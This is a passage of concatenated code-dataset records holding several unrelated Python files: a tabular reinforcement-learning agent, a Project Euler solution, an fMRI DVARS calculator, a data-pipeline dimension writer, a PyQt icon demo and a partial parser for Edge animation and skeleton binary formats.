np.argmax(a_table[a_copy_state[0], a_copy_state[1], a_copy_state[2], :])\n\t\t\t\tq_copy_state[1] = second_word\n\n\t\t\tif mc_explore | copy_explore | ~q_visited[q_copy_state[0], q_copy_state[1]]:\n\t\t\t\t# Explore:\n\t\t\t\tcopy_guess = (random.randint(0,num_atts-1), random.randint(0,num_atts-1))\n\t\t\telse:\n\t\t\t\t# Exploit:\n\t\t\t\tvalues = q_table[q_copy_state[0], q_copy_state[1], :, :]\n\t\t\t\tcopy_guess = np.unravel_index(values.argmax(), values.shape)\n\n\t\t\tcopy_reward = -1\n\t\t\tif (instance == copy_guess):\n\t\t\t\tcopy_reward = 1\n\n\t\t\toptions[choice] += copy_reward\n\t\t\tcounts[choice] += 1\n\n\t\tfirst_word = np.argmax(options/counts)\n\t\ta_state[2] = first_word\n\n\t\tif mc_update:\n\t\t\tfor i in range(vocab_size):\n\t\t\t\ta_table[a_state[0], a_state[1], vocab_size, i] = options[i]\n\t\t\ta_visited[a_state[0], a_state[1], vocab_size] = True\n\n\telse:\n\t\t# Exploit:\n\t\tif len(a_table[a_state[0], a_state[1], a_state[2], :]) != vocab_size:\n\t\t\traise Exception(\"Incorrect table size.\")\n\t\tfirst_word = np.argmax(a_table[a_state[0], a_state[1], a_state[2], :])\n\t\ta_state[2] = first_word\n\n\tq_state = [a_state[2], vocab_size]\n\n\t# Get second action:\n\tif explore | ~a_visited[a_state[0], a_state[1], a_state[2]]:\n\t\t# Explore:\n\t\toptions = np.zeros(vocab_size)\n\t\tcounts = np.zeros(vocab_size)\n\t\tfor i in range(k):\n\t\t\tchoice = random.randint(0,vocab_size-1)\n\t\t\tq_copy_state = copy(q_state)\n\t\t\tq_copy_state[1] = choice\n\t\t\tcopy_tradeoff = random.random()\n\t\t\tcopy_explore = (copy_tradeoff < epsilon)\n\n\t\t\tif mc_explore | copy_explore | ~q_visited[q_copy_state[0], q_copy_state[1]]:\n\t\t\t\t# Explore:\n\t\t\t\tcopy_guess = (random.randint(0,num_atts-1), random.randint(0,num_atts-1))\n\t\t\telse:\n\t\t\t\t# Exploit:\n\t\t\t\tvalues = q_table[q_copy_state[0], q_copy_state[1], :, :]\n\t\t\t\tcopy_guess = np.unravel_index(values.argmax(), values.shape)\n\n\t\t\tcopy_reward = -1\n\t\t\tif (instance == copy_guess):\n\t\t\t\tcopy_reward = 1\n\n\t\t\toptions[choice] += copy_reward\n\t\t\tcounts[choice] += 1\n\n\t\tsecond_word = np.argmax(options/counts)\n\t\tq_state[1] = second_word\t\t\n\n\t\tif mc_update:\n\t\t\tfor i in range(vocab_size):\n\t\t\t\ta_table[a_state[0], a_state[1], a_state[2], i] = options[i]\n\t\t\ta_visited[a_state[0], a_state[1], a_state[2]] = True\n\n\n\telse:\n\t\t# Exploit:\n\t\tif len(a_table[a_state[0], a_state[1], a_state[2], :]) != vocab_size:\n\t\t\traise Exception(\"Incorrect table size.\")\n\t\tsecond_word = np.argmax(a_table[a_state[0], a_state[1], a_state[2], :])\n\t\tq_state[1] = second_word\n\n\n\n\t# Get Q-Bot guess:\n\tif explore | ~q_visited[q_state[0], q_state[1]]:\n\t\t# Explore:\n\t\toptions = np.zeros((num_atts, num_atts))\n\t\tguess = (random.randint(0,num_atts-1), random.randint(0,num_atts-1))\n\t\tfor i in range(num_atts):\n\t\t\tfor j in range(num_atts):\n\t\t\t\tcopy_guess = (i, j)\n\t\t\t\tif (instance == copy_guess):\n\t\t\t\t\tguess = copy_guess\n\t\t\t\t\toptions[i][j] += 1\n\t\t\t\telse:\n\t\t\t\t\toptions[i][j] -= 1\n\n\t\tif mc_update:\n\t\t\tfor i in range(num_atts):\n\t\t\t\tfor j in range(num_atts):\n\t\t\t\t\tq_table[q_state[0], q_state[1], i, j] = options[i][j]\n\t\t\tq_visited[q_state[0], q_state[1]] = True\n\telse:\n\t\t# Exploit:\n\t\tvalues = q_table[q_state[0], q_state[1], :, :]\n\t\tguess = np.unravel_index(values.argmax(), values.shape)\n\n\t# Calculate reward:\n\treward = -1\n\tif (instance == guess):\n\t\treward = 1\n\t# elif(instance[0] == guess[0] or instance[1] == guess[1]):\n\t# \treward = -.5\n\n\tif not mc_update:\n\t\tinitial_a_state = [instance[0], instance[1], vocab_size]\n\t\tfinal_a_state = a_state\n\n\t\ta_visited[initial_a_state[0], initial_a_state[1], initial_a_state[2]] = True\n\t\ta_table[initial_a_state[0], initial_a_state[1], initial_a_state[2], first_word] += reward\n\t\ta_visited[final_a_state[0], final_a_state[1], final_a_state[2]] = True\n\t\ta_table[final_a_state[0], final_a_state[1], final_a_state[2], second_word] += reward\n\n\t\tfinal_q_state = q_state\n\n\t\tq_visited[q_state[0], q_state[1]] = True\n\t\tq_table[q_state[0], q_state[1], guess[0], guess[1]] += reward\n\n\t# epsilon = min_epsilon + (max_epsilon - min_epsilon)*np.exp(-decay_rate*episode)\n\tif num_episodes > 5000 and not explore:\n\t\ttotal += 1\n\t\tif (instance == guess):\n\t\t\twins += 1\n\nprint(wins / total)\n# print(a_table)","repo_name":"nickatomlin/Emergent","sub_path":"src/agents/tabular_montecarlo.py","file_name":"tabular_montecarlo.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"33001158003","text":"import math\n\n# Prime factorization (Sieve) code from https://www.geeksforgeeks.org/print-all-prime-factors-of-a-given-number/\ndef primeFactors(n):\n factors = []\n while n % 2 == 0:\n factors.append(2)\n n = n / 2\n\n for i in range(3, int(math.sqrt(n)) + 1, 2):\n while n % i == 0:\n factors.append(int(i))\n n = n / i\n\n if n > 2:\n factors.append(int(n))\n return factors\n\n\ndef allFactors(n):\n factors = primeFactors(n)\n while True:\n _ = factors.copy()\n for factor in factors:\n for j in factors:\n newvalue = factor*j\n if newvalue not in factors and n % newvalue == 0:\n factors.append(newvalue)\n if _ == factors:\n break\n if n in factors: # BAD SOLUTION - THIS IS A HACK\n factors.remove(n)\n factors.append(1)\n factors = list(dict.fromkeys(factors))\n factors.sort()\n return factors\n\n\ndef d(n):\n return sum(allFactors(n))\n\n\nall_pairs = []\nrev_pairs = []\nami_pairs = []\n\nfor i in range(1, 10001):\n match = [i, d(i)]\n all_pairs.append(match)\n\nprint(\"Found d(n) for n in (1, 10000)\")\n\nfor pair in all_pairs:\n rev_pairs.append([pair[1], pair[0]])\n\nfor pair in rev_pairs:\n if pair in all_pairs:\n if pair[0] != pair[1]:\n ami_pairs.append(pair)\n\nprint(ami_pairs)\n\n\nsolution = []\n\nfor pair in ami_pairs:\n solution.append(pair[0])\n solution.append(pair[1])\n\nprint(solution)\nsolution2 = list(dict.fromkeys(solution))\n\nprint(solution2)\nprint(sum(solution2))\n","repo_name":"andytfma/python-project-euler","sub_path":"5% difficulty problems/solution21_amicable.py","file_name":"solution21_amicable.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38458379751","text":"# dvars_se.py\n\"\"\"\nCompute DVARS on single echo EPI data.\n\nFor usage see: python dvars_se.py -h\n\nExample usage:\npython dvars_se.py -d rest_sm.nii.gz\n\"\"\"\n\n# import modules\nimport numpy as np\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nfrom optparse import OptionParser\nimport pandas as pd\n\n\n# function to parse input arguments\ndef parse_args():\n \"\"\"\n Parse arguments.\n \"\"\"\n parser=OptionParser()\n parser.add_option('-d',\"\",dest='data',help=\"EPI data to compute DVARS on file ex: -d rest_sm.nii.gz\",default=None)\n parser.add_option('-p',\"\",action=\"store_true\",dest='plot',help=\"Make DVARS plot\",default=False)\n (options,args) = parser.parse_args()\n return(options)\n\ndef make_plot(data):\n \"\"\"\n Make DVARS plot\n \"\"\"\n plt.plot(data)\n plt.xlabel(\"Frame #\")\n plt.ylabel(\"DVARS (%x10)\")\n plt.show()\n\n\ndef compute_summary_stats(dvars):\n \"\"\"\n Compute summary stats.\n \"\"\"\n summary_stats = {\"meanDVARS\":dvars.mean(), \"medianDVARS\":np.median(dvars),\n \"minDVARS\":dvars.min(), \"maxDVARS\":dvars.max()}\n return(summary_stats)\n\ndef write_summary_stats(summary_stats, outname):\n \"\"\"\n Write summary stats to file.\n \"\"\"\n\n outseries = pd.Series(summary_stats)\n outseries.to_csv(outname)\n\n\n\n# boilerplate code to call main code for executing\nif __name__ == '__main__':\n\n # Parse arguments\n opts = parse_args()\n data_file = opts.data\n\n # load data\n nii = data_file\n fn = nib.load(nii)\n\n # get data and vectorize\n nx,ny,nz,nt = fn.get_data().shape\n data = fn.get_data().reshape([nx*ny*nz,nt]).T\n\n # compute mean\n d_mu = data.mean(0)\n\n # compute mask\n d_mask = d_mu!=0\n\n # grab voxels within mask\n db=data[:,d_mask]\n\n # compute DVARS\n dbdt = np.abs(np.diff(db,n=1,axis=0))+0.0000001\n dvars = np.sqrt(np.mean(dbdt**2,1))\n\n # save DVARS to text file\n np.savetxt('%s_dvars.txt' % nii.split('.')[0],dvars)\n\n # save summary stats to a file\n summary_stats = compute_summary_stats(dvars)\n outname = '%s_dvars_summary_stats.csv' % (data_file.split('.')[0])\n write_summary_stats(summary_stats, outname)\n\n # make plot\n if opts.plot:\n make_plot(dvars)\n","repo_name":"mvlombardo/rsfmri","sub_path":"dvars_se.py","file_name":"dvars_se.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"15321837705","text":"'''Supports the reading and writing of files for the DimensionCollector.\n'''\nfrom builtins import next\nfrom util.file.unicode_csv import UnicodeDictReader, UnicodeDictWriter\n\n# The column name used when the non-hierarchical dimensions are written to a file.\nDIMENSION_TYPE_COLUMN = 'dimension'\n\n\ndef add_prefix(prefix, text):\n return f'{prefix}{text}'\n\n\n# TODO: There is a lot of weird indirection in the utilities in this\n# file. We should make the I/O operations a lot more straightforward.\n\n\nclass DimensionCollectorReader:\n '''Reads through a file outputted by a DimensionCollector.'''\n\n def __init__(self, open_file, prefix, dimensions, is_dimension_collector_source):\n self.prefix = prefix\n self.dimensions = dimensions\n self.reader = UnicodeDictReader(open_file)\n\n def __iter__(self):\n return self\n\n def extract_values(self, row: dict) -> dict:\n raise ValueError('Must be implemented by subclass')\n\n def __next__(self):\n # NOTE: This will raise a StopIteration when there are no more\n # items left, and should be used with a for loop.\n return self.extract_values(next(self.reader))\n\n\nclass HierarchicalDimensionCollectorReader(DimensionCollectorReader):\n def __init__(self, is_dimension_collector_source, *args, **kwargs):\n super().__init__(is_dimension_collector_source, *args, **kwargs)\n self.is_dimension_collector_source = is_dimension_collector_source\n self.extraction_map = {\n dimension_name: add_prefix(self.prefix, dimension_name)\n for dimension_name in self.dimensions\n }\n\n def extract_values(self, row: dict) -> dict:\n # If this is a legacy source, then we can just return the row\n if not self.is_dimension_collector_source:\n return row\n\n return {\n dimension_name: row[mapping_key]\n for dimension_name, mapping_key in self.extraction_map.items()\n }\n\n\nclass NonHierarchicalDimensionCollectorReader(DimensionCollectorReader):\n def extract_values(self, row: dict) -> dict:\n return {row[DIMENSION_TYPE_COLUMN]: row[self.prefix]}\n\n\ndef build_combined_header(dimension_list, input_prefix, output_prefix):\n '''Returns a list where the first half of the list are the elements in\n dimension_list with 'input' prepended, and then 'output'.\n '''\n header = []\n for prefix in (input_prefix, output_prefix):\n for dimension_name in dimension_list:\n header.append(add_prefix(prefix, dimension_name))\n\n return header\n\n\ndef write_hierarchical_dimensions(\n collector,\n hierarchical_filename,\n input_prefix,\n output_prefix,\n unmatched_filename=None,\n):\n handle_unmatched = unmatched_filename is not None\n # NOTE: Default the filename to '/dev/null' here (which would have no effect) to be\n # able to conditionally open an unmatched file\n unmatched_filename = unmatched_filename or '/dev/null'\n\n with open(hierarchical_filename, 'w') as hierarchical_file, open(\n unmatched_filename, 'w'\n ) as unmatched_file:\n header = build_combined_header(\n collector.HIERARCHICAL_DIMENSIONS, input_prefix, output_prefix\n )\n hierarchical_writer = UnicodeDictWriter(hierarchical_file, header)\n hierarchical_writer.writeheader()\n if handle_unmatched:\n unmatched_writer = UnicodeDictWriter(unmatched_file, header)\n unmatched_writer.writeheader()\n\n for dimension_dict in collector.hierarchical_combinations.values():\n item_dict = {}\n for dimension_name in collector.HIERARCHICAL_DIMENSIONS:\n input_dimension = dimension_dict['input'].get(dimension_name, '')\n output_dimension = dimension_dict['output'].get(dimension_name, '')\n\n item_dict.update(\n {\n add_prefix(input_prefix, dimension_name): input_dimension,\n add_prefix(output_prefix, dimension_name): output_dimension,\n }\n )\n\n if handle_unmatched and not output_dimension and input_dimension:\n # If the output dimension is empty for a non empty input dimension\n # this means the dimension was unmatched at this dimension level.\n # Therefore we write it to the unmatched locations file.\n unmatched_writer.writerow(item_dict)\n\n hierarchical_writer.writerow(item_dict)\n\n\ndef write_non_hierarchical_dimensions(\n collector,\n filename,\n input_text,\n output_text,\n unmatched_filename=None,\n):\n handle_unmatched = unmatched_filename is not None\n # NOTE: Default the filename to '/dev/null' here (which would have no effect) to be\n # able to conditionally open an unmatched file\n unmatched_filename = unmatched_filename or '/dev/null'\n\n with open(filename, 'w') as non_hierarchical_file, open(\n unmatched_filename, 'w'\n ) as unmatched_file:\n header = [DIMENSION_TYPE_COLUMN, input_text, output_text]\n writer = UnicodeDictWriter(non_hierarchical_file, header)\n writer.writeheader()\n if handle_unmatched:\n unmatched_writer = UnicodeDictWriter(unmatched_file, header)\n unmatched_writer.writeheader()\n\n for dimension_name, val_dict in collector.non_hierarchical_items.items():\n for original_val, transformed_val in val_dict.items():\n item_dict = {\n DIMENSION_TYPE_COLUMN: dimension_name,\n input_text: original_val,\n output_text: transformed_val,\n }\n\n if handle_unmatched and not transformed_val:\n # If the transformed_val is empty this means the dimension was unmatched.\n # Therefore we write it to the unmatched non-hierarchical dimensions file.\n unmatched_writer.writerow(item_dict)\n\n writer.writerow(item_dict)\n","repo_name":"Zenysis/Harmony","sub_path":"data/pipeline/datatypes/dimension_collector_io.py","file_name":"dimension_collector_io.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"8743356617","text":"# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore, QtGui\n\nclass MyWindow(QtGui.QWidget):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.resize(300, 150)\n self.my_icon = QtGui.QIcon()\n self.my_icon.addFile(\"icon1.png\", QtCore.QSize(32, 32),\n mode=QtGui.QIcon.Normal)\n self.my_icon.addPixmap(QtGui.QPixmap(\"icon2.png\"),\n mode=QtGui.QIcon.Normal)\n self.my_icon.addFile(\"icon3.png\", QtCore.QSize(32, 32),\n mode=QtGui.QIcon.Disabled)\n self.pix1 = self.my_icon.pixmap(32, 32, mode=QtGui.QIcon.Normal)\n self.pix2 = self.my_icon.pixmap(16, 16, mode=QtGui.QIcon.Normal)\n self.pix3 = self.my_icon.pixmap(32, 32,\n mode=QtGui.QIcon.Disabled)\n self.my_icon2 = self.style().standardIcon(\n QtGui.QStyle.SP_MessageBoxCritical)\n self.pix4 = self.my_icon2.pixmap(32, 32, mode=QtGui.QIcon.Normal)\n self.pix5 = self.my_icon2.pixmap(32, 32,\n mode=QtGui.QIcon.Disabled)\n print(self.my_icon.availableSizes(mode=QtGui.QIcon.Normal))\n print(self.my_icon.availableSizes(mode=QtGui.QIcon.Disabled))\n print(self.my_icon.actualSize(QtCore.QSize(16, 16),\n mode=QtGui.QIcon.Normal))\n\n def paintEvent(self, e):\n painter = QtGui.QPainter(self)\n painter.drawPixmap(5, 10, self.pix1)\n painter.drawPixmap(50, 10, self.pix2)\n painter.drawPixmap(100, 10, self.pix3)\n painter.drawPixmap(150, 10, self.pix4)\n painter.drawPixmap(200, 10, self.pix5)\n\nif __name__ == \"__main__\":\n import sys\n app = QtGui.QApplication(sys.argv)\n window = MyWindow()\n window.setWindowTitle(\"Класс QIcon\")\n window.show()\n sys.exit(app.exec_())","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/006_Working with graphics/003_Working with Images/555. QIcon.py","file_name":"555. QIcon.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"16849647501","text":"import struct\n\n\n# edgeanim_skeleton\nclass EdgeAnimUserChannelFlags:\n EDGE_ANIM_USER_CHANNEL_FLAG_CLAMP01 = 0x01\n EDGE_ANIM_USER_CHANNEL_FLAG_MINMAX = 0x02\n EDGE_ANIM_USER_CHANNEL_FLAG_CPT_SHIFT = 0x03\n EDGE_ANIM_USER_CHANNEL_FLAG_CPT_BIT1 = 0x08\n EDGE_ANIM_USER_CHANNEL_FLAG_CPT_BIT0 = 0x10\n\n\nclass EdgeAnimationSkeleton:\n def __init__(self, data):\n if data[0:4] == b'60SE':\n self.bigEndian = False\n elif data[0:4] == b'ES06':\n self.bigEndian = True\n print(\"Support for big endian file is very experimental\")\n else:\n print(\"Skeleton File Incorrect\")\n return\n\n self.length = len(data)\n self.data = data\n\n self.tag, \\\n self.izeTotal, \\\n self.sizeCustomData, \\\n self.sizeNameHashes, \\\n self.numJoints, \\\n self.numUserChannels, \\\n self.flags, \\\n self.locomotionJointIndex, \\\n self.offsetBasePose, \\\n self.offsetJointLinkageMap, \\\n self.offsetJointNameHashArray, \\\n self.offsetUserChannelNameHashArray, \\\n self.offsetUserChannelNodeNameHashArray, \\\n self.offsetUserChannelFlagsArray, \\\n self.offsetCustomData, \\\n self.pad1, \\\n self.pad2, \\\n self.numJointLinkages, \\\n self.jointLinkage0 = \\\n struct.unpack(('<', '>')[self.bigEndian] + '4I4H10IH', data[:66])\n\n self.offsetBasePose += 0x18\n self.offsetJointLinkageMap += 0x1c\n self.offsetJointNameHashArray += 0x20\n self.offsetUserChannelNameHashArray += 0x24\n self.offsetUserChannelNodeNameHashArray += 0x28\n self.offsetUserChannelFlagsArray += 0x2c\n\nclass UserChannelInfo:\n def __init__(self, nodeNameHash = None, channelNameHash = None, componentIndex = None, flags = None):\n self.m_nodeNameHash = nodeNameHash\n self.m_channelNameHash = channelNameHash\n self.m_componentIndex = componentIndex\n self.m_flags = flags\n\nclass Skeleton:\n def __init__(self):\n self.m_locoJointIndex = None\n self.m_numJoints = None\n self.m_numUserChannels = None\n self.m_parentIndices = []\n self.m_basePose = []\n self.m_scaleCompensateFlags = []\n self.m_jointNameHashes = None\n self.m_userChannelInfoArray = []\n self.m_customData = None\n\n\n# edgeanim_animation\nclass AnimationKeyframe:\n kKeyFrameStepped = (1 << 0)\n kKeyFrameMask = kKeyFrameStepped\n\n def __init__(self):\n self.m_keyTime = 0.0\n self.m_keyData = [0.0, 0.0, 0.0, 0.0]\n self.m_keyFlags = 0\n\n\nclass EdgeAnimAnimationEncodingFlags:\n EDGE_ANIM_FLAG_BIT_PACKED_R = 0x01\n EDGE_ANIM_FLAG_BIT_PACKED_T = 0x02\n EDGE_ANIM_FLAG_BIT_PACKED_S = 0x04\n EDGE_ANIM_FLAG_BIT_PACKED_U = 0x08\n EDGE_ANIM_FLAG_RAW_R = 0x10\n\n\nclass EdgeAnimAnimation:\n def __init__(self, data):\n if data[0:4] == b'80AE':\n self.bigEndian = False\n elif data[0:4] == b'EA08':\n self.bigEndian = True\n print(\"Support for big endian file is very experimental\")\n else:\n print(\"Animation File Incorrect\")\n return\n\n self.length = len(data)\n self.data = data\n\n self.tag, \\\n self.duration, \\\n self.sampleFrequency, \\\n self.sizeHeader, \\\n self.numJoints, \\\n self.numFrames, \\\n self.numFrameSets, \\\n self.evalBufferSizeRequired, \\\n self.numConstRChannels, \\\n self.numConstTChannels, \\\n self.numConstSChannels, \\\n self.numConstUserChannels, \\\n self.numAnimRChannels, \\\n self.numAnimTChannels, \\\n self.numAnimSChannels, \\\n self.numAnimUserChannels, \\\n self.numUserChannels, \\\n self.sizeJointsWeightArray, \\\n self.sizeUserChannelWeightArray, \\\n self.flags, \\\n self.offsetJointsWeightArray, \\\n self.offsetUserChannelWeightArray, \\\n self.offsetFrameSetDmaArray, \\\n self.offsetFrameSetInfoArray, \\\n self.offsetConstRData, \\\n self.offsetConstTData, \\\n self.offsetConstSData, \\\n self.offsetConstUserData, \\\n self.offsetPackingSpecs, \\\n self.offsetCustomData, \\\n self.sizeCustomData, \\\n self.offsetLocomotionDelta, \\\n self.channelTables0 = \\\n struct.unpack(('<', '>')[self.bigEndian] + 'I2f16H13IH', data[:98])\n\n self.offsetFrameSetDmaArray += 0x38\n self.offsetFrameSetInfoArray += 0x3C\n self.offsetConstRData += 0x40\n self.offsetConstTData += 0x44\n self.offsetConstSData += 0x48\n self.offsetConstUserData += 0x4C\n self.offsetPackingSpecs += 0x50\n\n\nclass EdgeAnimFrameSetInfo:\n def __init__(self, data, endianSwap):\n self.baseFrame , self.numIntraFrames = struct.unpack(('<', '>')[endianSwap] + 'HH', data[:4])\n\n\n#libedgeanimtool_animation\nclass Animation:\n def __init__(self):\n self.m_startTime = 0.0\n self.m_endTime = 0.0\n self.m_period = 0.0\n self.m_numFrames = 0\n \n self.m_enableLocoDelta = False\n self.m_locoDeltaQuat = None\n self.m_locoDeltaTrans = None\n \n self.m_jointAnimations = []\n self.m_userChannelAnimations = []\n\n self.m_enableWeights = None\n self.m_jointWeights = None\n self.m_userChannelWeights = None\n\n\n\nclass JointAnimation:\n def __init__(self):\n self.m_jointName = None\n self.m_jointWeight = None\n \n self.m_rotationAnimation = []\n self.m_translationAnimation = []\n self.m_scaleAnimation = []\n\n\nclass JointFrameSet:\n def __init__(self):\n self.m_initialRData = None\n self.m_initialTData = None\n self.m_initialSData = None\n \n self.m_intraRDataFrames = None\n self.m_intraTDataFrames = None\n self.m_intraSDataFrames = None\n \n self.m_hasRFrame = None\n self.m_hasTFrame = None\n self.m_hasSFrame = None\n\n\nclass UserChannelAnimation:\n def __init__(self):\n self.m_nodeName = None\n self.m_channelName = None\n self.m_weight = None\n \n self.m_animation = []\n\n\nclass UserChannelFrameSet:\n def __init__(self):\n self.m_initialData = None\n self.m_intraDataFrames = None\n self.m_hasFrame = None\n\n\nclass FrameSet:\n def __init__(self):\n self.m_baseFrame = None\n self.m_numIntraFrames = None\n\n\nclass EdgeAnimCompressionType:\n COMPRESSION_TYPE_NONE = 0\n COMPRESSION_TYPE_SMALLEST_3 = 1\n COMPRESSION_TYPE_BITPACKED = 2\n\n\nclass CompressionInfo:\n def __init__(self):\n self.m_maxEvalBufferSize = None\n \n self.m_compressionTypeRotation = EdgeAnimCompressionType.COMPRESSION_TYPE_SMALLEST_3\n self.m_compressionTypeTranslation = EdgeAnimCompressionType.COMPRESSION_TYPE_NONE\n self.m_compressionTypeScale = EdgeAnimCompressionType.COMPRESSION_TYPE_NONE\n self.m_compressionTypeUser = EdgeAnimCompressionType.COMPRESSION_TYPE_NONE\n \n self.m_defaultToleranceRotation = 0.001\n self.m_defaultToleranceTranslation = 0.001\n self.m_defaultToleranceScale = 0.001\n self.m_defaultToleranceUser = 0.001\n \n self.m_jointTolerancesRotation = None\n self.m_jointTolerancesTranslation = None\n self.m_jointTolerancesScale = None\n self.m_userChannelTolerances = None\n\n\nclass CompressedFrameSet:\n def __init__(self):\n self.m_baseFrame = None\n self.m_numIntraFrames = None\n \n self.m_initialRRaw = []\n self.m_initialRSmallest3 = []\n self.m_initialTRaw = []\n self.m_initialSRaw = []\n self.m_initialURaw = []\n \n self.m_initialRBitpacked = None\n self.m_initialTBitpacked = None\n self.m_initialSBitpacked = None\n self.m_initialUBitpacked = None\n \n self.m_intraBits = b''\n \n self.m_intraRRaw = []\n self.m_intraRSmallest3 = []\n self.m_intraTRaw = []\n self.m_intraSRaw = []\n self.m_intraURaw = []\n \n self.m_intraRBitpacked = None\n self.m_intraTBitpacked = None\n self.m_intraSBitpacked = None\n self.m_intraUBitpacked = None\n\n\nclass CompressedAnimation:\n def __init__(self):\n self.m_duration = None\n self.m_sampleFrequency = None\n self.m_numJoints = None\n self.m_numUserChannels = None\n self.m_numFrames = None\n self.m_numFrameSets = None\n self.m_evalBufferSizeRequired = None\n \n self.m_enableLocoDelta = None\n self.m_locoDeltaQuat = None\n self.m_locoDeltaTrans = None\n \n self.m_customData = None\n \n self.m_enableWeights = None\n self.m_jointWeights = None\n self.m_userChannelWeights = None\n \n self.m_numConstRChannels = None\n self.m_numConstTChannels = None\n self.m_numConstSChannels = None\n self.m_numConstUChannels = None\n self.m_numAnimRChannels = None\n self.m_numAnimTChannels = None\n self.m_numAnimSChannels = None\n self.m_numAnimUChannels = None\n \n self.m_compressionInfo = None\n \n self.m_packingSpecsR = []\n self.m_packingSpecsT = []\n self.m_packingSpecsS = []\n self.m_packingSpecsU = []\n \n self.m_constRChannels = None\n self.m_constTChannels = None\n self.m_constSChannels = None\n self.m_constUChannels = None\n self.m_animRChannels = None\n self.m_animTChannels = None\n self.m_animSChannels = None\n self.m_animUChannels = None\n \n self.m_constRRaw = []\n self.m_constRSmallest3 = []\n self.m_constTRaw = []\n self.m_constSRaw = []\n self.m_constURaw = []\n \n self.m_constRBitpacked = None\n self.m_constTBitpacked = None\n self.m_constSBitpacked = None\n self.m_constUBitpacked = None\n \n self.m_frameSets = []\n\n\n#libedgeanimtool_common\nclass Joint:\n def __init__(self, data, bigEndian = False):\n self.m_rotation = struct.unpack(('<', '>')[bigEndian] + '4f', data[:16])\n self.m_translation = struct.unpack(('<', '>')[bigEndian] + '4f', data[16:32])\n self.m_scale = struct.unpack(('<', '>')[bigEndian] + '4f', data[32:48])\n\ndef Reverse(input, endianSwap): #Fuck! How can I tell it's short???? Gonna ignore this for now lol, no one uses Big Endian\n return input\n # if endianSwap:\n # if isinstance(input, list):\n # for element in input:\n # element = Reverse(element, true)\n # else:\n\n\n#libedgeanimtool_bitpacking\nclass KeyframePackingSpec:\n def __init__(self, packedSpec):\n self.m_componentSpecs = [None, None, None]\n self.m_componentSpecs[0] = ComponentPackingSpec((packedSpec >> 31) & 1, (packedSpec >> 27) & 15, (packedSpec >> 22) & 31)\n self.m_componentSpecs[1] = ComponentPackingSpec((packedSpec >> 21) & 1, (packedSpec >> 17) & 15, (packedSpec >> 12) & 31)\n self.m_componentSpecs[2] = ComponentPackingSpec((packedSpec >> 11) & 1, (packedSpec >> 7) & 15, (packedSpec >> 2) & 31)\n self.m_recomputeComponentIdx = packedSpec & 3\n\n def GetNumBits(self):\n return self.m_componentSpecs[0].GetNumBits() + self.m_componentSpecs[1].GetNumBits() + self.m_componentSpecs[2].GetNumBits()\n\n\nclass ComponentPackingSpec:\n def __init__(self, s, e, m):\n self.m_numSignBits = s\n self.m_numExponentBits = e\n self.m_numMantissaBits = m\n\n def GetNumBits(self):\n return self.m_numSignBits + self.m_numExponentBits + self.m_numMantissaBits\n\n def Decode(self, bits):\n res = 0.0\n maskTable = [\n 0x00000000,\n 0x00000001, 0x00000003, 0x00000007, 0x0000000F,\n 0x0000001F, 0x0000003F, 0x0000007F, 0x000000FF,\n 0x000001FF, 0x000003FF, 0x000007FF, 0x00000FFF,\n 0x00001FFF, 0x00003FFF, 0x00007FFF, 0x0000FFFF,\n 0x0001FFFF, 0x0003FFFF, 0x0007FFFF, 0x000FFFFF,\n 0x001FFFFF, 0x003FFFFF, 0x007FFFFF, 0x00FFFFFF,\n 0x01FFFFFF, 0x03FFFFFF, 0x07FFFFFF, 0x0FFFFFFF,\n 0x1FFFFFFF, 0x3FFFFFFF, 0x7FFFFFFF, 0xFFFFFFFF]\n signMaskTable = [\n 0x00000001, 0x00000002, 0x00000004, 0x00000008,\n 0x00000010, 0x00000020, 0x00000040, 0x00000080,\n 0x00000100, 0x00000200, 0x00000400, 0x00000800,\n 0x00001000, 0x00002000, 0x00004000, 0x00008000,\n 0x00010000, 0x00020000, 0x00040000, 0x00080000,\n 0x00100000, 0x00200000, 0x00400000, 0x00800000,\n 0x01000000, 0x02000000, 0x04000000, 0x08000000,\n 0x10000000, 0x20000000, 0x40000000, 0x80000000]\n signExtendTable = [\n 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFC, 0xFFFFFFF8,\n 0xFFFFFFF0, 0xFFFFFFE0, 0xFFFFFFC0, 0xFFFFFF80,\n 0xFFFFFF00, 0xFFFFFE00, 0xFFFFFC00, 0xFFFFF800,\n 0xFFFFF000, 0xFFFFE000, 0xFFFFC000, 0xFFFF8000,\n 0xFFFF0000, 0xFFFE0000, 0xFFFC0000, 0xFFF80000,\n 0xFFF00000, 0xFFE00000, 0xFFC00000, 0xFF800000,\n 0xFF000000, 0xFE000000, 0xFC000000, 0xF8000000,\n 0xF0000000, 0xE0000000, 0xC0000000, 0x80000000,\n 0x00000000]\n expBiasTable = [128, 127, 126, 124, 120, 112, 96, 64, 0, -128, -384]\n\n # Floating point mode\n if self.m_numExponentBits:\n m = bits & maskTable[self.m_numMantissaBits]\n e = struct.unpack('i', ((bits >> self.m_numMantissaBits) & maskTable[self.m_numExponentBits]).to_bytes(4, byteorder='little'))[0] #Not sure y it's int32 not uint32, just cast it in case\n s = (bits >> (self.m_numMantissaBits + self.m_numExponentBits)) & maskTable[self.m_numSignBits]\n\n if self.m_numExponentBits:\n e += expBiasTable[self.m_numExponentBits]\n\n if (self.m_numMantissaBits <= 23):\n m <<= (23 - self.m_numMantissaBits)\n else:\n m >>= self.m_numMantissaBits - 23\n\n # Clamp exponent - is it really necessary?\n if e > 0x7FFFFFF:\n e = 0\n m = 0\n s = 0\n elif e >= ( 1 << 8 ):\n e = ( 1 << 8 ) - 1\n m = 0xffffffff >> ( 32 - 23 )\n\n 